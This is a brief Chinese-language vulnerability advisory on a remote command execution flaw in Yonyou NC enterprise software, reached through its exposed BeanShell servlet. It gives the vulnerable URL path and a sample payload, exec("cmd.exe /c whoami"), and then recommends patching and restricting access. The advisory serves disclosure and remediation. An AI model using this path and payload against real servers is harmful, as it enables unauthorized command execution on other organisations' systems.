一、漏洞描述
用友NC是一款企业级管理软件,在大中型企业广泛使用。实现建模、开发、继承、运行、管理一体化的IT解决方案信息化平台。用友 NC bsh.servlet.BshServlet目录存在远程命令执行漏洞,可通过BeanShell 执行远程命令。
二、漏洞利用
1. 访问http://xxxxxxx/servlet/~ic/bsh.servlet.BshServlet
2. 在Script中输入 exec("cmd.exe /c whoami") 即可执行命令
三、漏洞修复
- 打补丁,升级到最新版本
- 严格限制访问权限